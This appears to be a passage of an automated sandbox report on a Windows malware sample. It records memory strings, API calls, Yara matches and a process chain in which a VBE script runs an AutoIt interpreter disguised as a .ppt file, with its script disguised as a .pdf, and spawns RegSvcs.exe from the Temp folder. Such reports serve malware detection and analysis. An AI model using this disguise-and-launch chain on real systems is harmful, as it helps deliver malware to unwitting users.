          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8x7w2memstr_009d8640-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ~e3y9memstr_e7210912-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n8pwqvqkmemstr_58ecf126-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 13lwn8pwqvqkmemstr_1cef8308-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 98uhdvmemstr_e51ae201-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: >y743memstr_fa0f2870-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6v1kd4aememstr_9b4b6a65-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o4rh 6oadg1memstr_b47719ed-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mboe4jrmemstr_06083727-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [up2gmemstr_4ac3087d-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f06ptcgnmemstr_c3db3b53-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivx37znmmemstr_d65122f6-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tip007qmemstr_986a5a93-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: updownk~memstr_4579286e-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nv-sa1umemstr_8bc5b620-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ca - shamemstr_2f76f3a1-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 83947zmemstr_ed98c800-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ul9d4fmemstr_ac719006-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ltdcd2memstr_e8790e4b-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cacert/gmemstr_445d4e19-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cacert/gsmemstr_ee5dd66e-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sha2g3memstr_79bb5bb3-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o0m4p8bmemstr_86a6fabf-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 806k1memstr_0bcd8fc1-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sh??>memstr_b7640ada-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3/ =$memstr_ace43145-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 01rm53memstr_f0264f58-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 84149z0memstr_9486a73b-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: u0spsmemstr_579c5b5c-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: advad127memstr_881f2498-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 60741memstr_d721d20b-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mxzcqmemstr_df294e83-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: zkld4fmemstr_bf8907ce-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /5umkmemstr_752076b7-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e0ca740memstr_96d6f11d-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &uvckmemstr_725aed07-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a1pn0memstr_03f4ff2b-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1vr(k_memstr_faebffb3-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]>y<ememstr_f6a728dc-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .@]|gtmemstr_b8542084-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0l1 0memstr_8a0e178f-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9#ymtmemstr_12c42a28-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6hb9omemstr_0e64b8d4-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x0i51memstr_0aff8299-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /by-memstr_af677996-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: xv83smemstr_e341f2c9-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'ylv9[memstr_b9ce8c26-7
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "na?mmemstr_91ad2b46-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 5@ivbsmemstr_349978a2-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #86i0memstr_129415d2-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ol220a4pvmemstr_211d74d6-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nwtq*memstr_32dbf7ef-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g5rr4memstr_962345b2-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gf97tmemstr_2765acd0-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;zx1nmemstr_4cf71067-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rsv,ffmemstr_4af40310-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,zbc2memstr_f55a696a-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wb72imemstr_075cd2a7-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j6u7%memstr_ae717f82-5
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gsg93memstr_c1dc3d80-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ltg0dmemstr_417cbe8d-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: reufpmemstr_5975bb49-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: loinubjmemstr_4f961c78-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i1w1rmemstr_0c1a93eb-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ai8bcmemstr_1b213c35-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6?sm,bmemstr_92a04ee4-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @$knfmemstr_377ae3e7-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8ov4|memstr_5f603e70-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @63gkmemstr_9c86c41e-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ptkxememstr_67fbef8a-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pyfasmemstr_1c9e57ac-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: v4mnwmemstr_cd9f08d9-0
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: w9dxsmemstr_8794f523-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c1cv0memstr_cf937345-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: wit#!memstr_398269b8-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: y6ts'memstr_6bc19508-9
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +ug;%memstr_52ebd3a9-6
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x86yfbsmemstr_3148c5b1-a
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )bb0ememstr_8986ec1c-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: b( ucmemstr_4ce53e03-1
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j9lvcmemstr_e67b29d9-4
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -yof0memstr_41023306-c
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a3jg2memstr_fc900f2e-b
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ictbh8memstr_76d6f21b-e
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !b23wrmemstr_e1bde047-8
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jsu0exmemstr_9241e88f-d
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0gazmmemstr_8b873323-2
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d]'o1memstr_6829d977-f
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %77fcmemstr_db9abd38-3
          Source: yjOJ1YK5M3.exe, 00000000.00000003.1676219165.0000000002996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: j$xj(memstr_e783c1ce-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: common administrative tools<&2memstr_4dd609f5-e
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: homegroupcurrentuserfolder4&:memstr_56ea6bb5-f
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\templates,&memstr_61fbef19-3
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: changeremoveprogramsfoldermemstr_a76ec980-7
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\inetcachememstr_4b33a190-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\templatesmemstr_9437079c-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: savedpictures.library-mst&zmemstr_c846e1ad-0
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: common start menu placesl&bmemstr_f77b06af-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\recent\&rmemstr_3cb65ab1-c
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\desktop.init&zmemstr_f68de724-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nt authority\networkservicel&memstr_477f76ab-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\ringtonesd&memstr_abb87f32-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\librariesmemstr_1c01fae8-5
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: visiocustom.propdescmemstr_0668c27c-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell file system foldermemstr_116b1ef4-5
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cbuxrmemstr_0bb50e46-9
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\burn\burnmemstr_9d3f8ae1-f
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\ringtonesmemstr_19590751-d
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\historymemstr_a08080a4-b
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\sendtomemstr_c8511cf5-d
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\drivers<'2memstr_d2ed74fc-1
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p$,u$memstr_cda9f08b-8
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n|'rmemstr_85f46b53-a
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nl'bmemstr_f3f9ea09-3
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: coremessagingd'jmemstr_cee13907-2
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n\'rmemstr_a59fc425-4
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: audio/mpeg memstr_8d1aedfd-9
          Source: yjOJ1YK5M3.exe, 00000000.00000002.1823715817.000000000295A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @a jmemstr_ee8c0465-4
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0075BB02 SendInput,keybd_event,6_2_0075BB02
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0075EBE5 mouse_event,6_2_0075EBE5
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\pgoh.vbe"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cipkucw.ppt xdgrnj.pdf
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt cipkucw.ppt xdgrnj.pdf
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\afda\cipkucw.ppt.exe | Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\RegSvcs.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_007513F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_007513F2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_00751EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,6_2_00751EF3
Source: yjOJ1YK5M3.exe, 00000000.00000003.1673628666.0000000006AFA000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp, cipkucw.ppt, 00000006.00000003.1795819448.0000000000E7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: cipkucw.ppt, 00000006.00000003.1894814022.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1894903844.0000000000DDC000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt, 00000006.00000003.1898812044.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: cipkucw.ppt, cipkucw.ppt.exe | Binary or memory string: Shell_TrayWnd
Source: cipkucw.ppt, 00000006.00000002.1901492335.0000000000D68000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.1947893692.0000000001534000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160662377.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: cipkucw.ppt.exe, 0000000F.00000003.2021858998.0000000001541000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 0000000F.00000003.2021874617.0000000001542000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" ThenKK
Source: cipkucw.ppt.exe, 00000013.00000003.2241821530.0000000001653000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000013.00000003.2241782650.000000000164E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" ThenLL
Source: xdgrnj.pdf.6.dr, xdgrnj.pdf.0.dr | Binary or memory string: If WinGetText("Program Manager") = "0" Then
Source: cipkucw.ppt.exe, 00000011.00000003.2166743027.0000000000B89000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2160554746.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, cipkucw.ppt.exe, 00000011.00000003.2165570776.0000000000B81000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager5
Source: cipkucw.ppt.exe, 00000013.00000003.2169637016.0000000001643000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" ThenU,
Source: cipkucw.ppt.exe, 00000011.00000003.2089984383.0000000000B34000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: If WinGetText("Program Manager") = "0" Thency

Language, Device and Operating System Detection

Source: Yara match | File source: Process Memory Space: cipkucw.ppt PID: 1420, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cipkucw.ppt.exe PID: 3484, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cipkucw.ppt.exe PID: 3732, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: cipkucw.ppt.exe PID: 5780, type: MEMORYSTR
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_00296694 cpuid 0_2_00296694
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_0028FD34
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_0029454A GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0029454A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0074E5F8 GetUserNameW,6_2_0074E5F8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt | Code function: 6_2_0072BF0F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_0072BF0F
Source: C:\Users\user\Desktop\yjOJ1YK5M3.exe | Code function: 0_2_002803BE GetVersionExW,0_2_002803BE
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: Yara match | File source: 17.3.cipkucw.ppt.exe.d56820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 19.3.cipkucw.ppt.exe.1854810.1.raw.unpack, type: UNPACKEDPE
